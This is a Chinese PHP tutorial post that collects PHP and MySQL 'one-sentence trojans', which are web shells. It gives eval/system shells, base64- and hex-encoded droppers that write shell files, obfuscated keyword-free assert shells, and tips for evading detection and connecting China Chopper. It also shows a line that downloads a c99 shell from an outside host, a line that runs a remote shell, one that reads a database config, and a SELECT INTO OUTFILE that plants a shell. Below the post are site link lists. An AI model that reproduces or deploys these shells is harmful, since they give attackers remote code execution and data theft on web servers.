PHP与SQL语句写一句话木马总结


Posted in PHP onOctober 11, 2019

一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:

<?php @eval($_GET["code"])?>

<?php @system($_POST["cmd"])?>

二、编码的替换的类型:

<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>

//会生成<?php @eval($_POST['lostwolf']);?>

 

<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>

//php在html内部的一种嵌入方式

 

<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>

 

 

<?php

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

三、其他类型:

<?php $_GET[a]($_GET[b]);?>

//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

<?php assert($_REQUEST["pass"]);?>   //菜刀连接 躲避检测 密码pass 

<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>

//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass

四、下载类型:

<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?> 

<? echo file_get_contents("..//cfg_database.php");?> //显示某文件

<? eval ( file_get_contents("远程shell")) ?> //运行远程shell

五、无关键函数类型:

<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

<?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

六、补充知识点:

SQL写一句话(MySQL):

select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"

#前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以

以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对三水点靠木的支持。

PHP 相关文章推荐
十天学会php之第七天
Oct 09 PHP
《PHP边学边教》(02.Apache+PHP环境配置――下篇)
Dec 13 PHP
PHP面向对象分析设计的经验原则
Sep 20 PHP
深入HTTP响应状态码速查表的详解
Jun 07 PHP
Zend Studio 实用快捷键一览表(精心整理)
Aug 10 PHP
PHP-FPM实现性能优化
Mar 31 PHP
PHP批量删除jQuery操作
Jul 23 PHP
PHP实现微信小程序人脸识别刷脸登录功能
May 24 PHP
thinkPHP框架实现的短信接口验证码功能示例
Jun 20 PHP
PHP实现简单日历类编写
Aug 28 PHP
PHP fopen中文文件名乱码问题解决方案
Oct 28 PHP
PHP解决高并发问题
Apr 01 PHP
解决在Laravel 中处理OPTIONS请求的问题
Oct 11 #PHP
php生成HTML文件的类方法
Oct 11 #PHP
php报错502badgateway解决方法
Oct 11 #PHP
Laravel timestamps 设置为unix时间戳的方法
Oct 11 #PHP
laravel 时间格式转时间戳的例子
Oct 11 #PHP
PHP调用接口API封装的例子
Oct 11 #PHP
Thinkphp5.0框架使用模型Model的获取器、修改器、软删除数据操作示例
Oct 11 #PHP
You might like
PHP封装的一个支持HTML、JS、PHP重定向的多功能跳转函数
2014/06/19 PHP
ThinkPHP模型详解
2015/07/27 PHP
PHP7.1新功能之Nullable Type用法分析
2016/09/26 PHP
关于jquery动态增减控件的一些想法和小插件
2010/08/01 Javascript
jquery实现带单选按钮的表格行选中时高亮显示
2013/08/01 Javascript
javascript unicode与GBK2312(中文)编码转换方法
2013/11/14 Javascript
Javascript中With语句用法实例
2015/05/14 Javascript
JS实现从顶部下拉显示的带动画QQ客服特效代码
2015/10/24 Javascript
jQuery插件实现适用于移动端的地址选择器
2016/02/18 Javascript
深入理解node.js之path模块
2017/05/03 Javascript
vue  directive定义全局和局部指令及指令简写
2018/11/20 Javascript
JS简单判断是否在微信浏览器打开的方法示例
2019/01/08 Javascript
JavaScript面向对象中接口实现方法详解
2019/07/24 Javascript
Python命令启动Web服务器实例详解
2017/02/23 Python
Python批量查询域名是否被注册过
2017/06/21 Python
Python判断字符串是否为字母或者数字(浮点数)的多种方法
2018/08/03 Python
如何使用Python进行OCR识别图片中的文字
2019/04/01 Python
python pygame实现挡板弹球游戏
2019/11/25 Python
Python求凸包及多边形面积教程
2020/04/12 Python
基于Python 的语音重采样函数解析
2020/07/06 Python
HTML5的download属性详细介绍和使用实例
2014/04/23 HTML / CSS
巴西图书和电子产品购物网站:Saraiva
2017/06/07 全球购物
施华洛世奇美国官网:SWAROVSKI美国
2018/02/08 全球购物
英国复古皮包品牌:Beara Beara
2018/07/18 全球购物
意大利香水和化妆品购物网站:Parfimo.it
2019/10/06 全球购物
PHP如何设置和取得Cookie值
2015/06/30 面试题
婚礼司仪主持词
2014/03/14 职场文书
放飞中国梦演讲稿
2014/04/23 职场文书
致800米运动员广播稿(10篇)
2014/10/17 职场文书
民政局离婚协议书范本
2014/10/20 职场文书
县级领导干部开展党的群众路线教育实践活动工作汇报
2014/10/25 职场文书
大学生自荐信怎么写
2015/03/26 职场文书
教师师德工作总结2015
2015/07/22 职场文书
go语言使用Casbin实现角色的权限控制
2021/06/26 Golang
MySQL 那些常见的错误设计规范,你都知道吗
2021/07/16 MySQL
解决pycharm下载库时出现Failed to install package的问题
2021/09/04 Python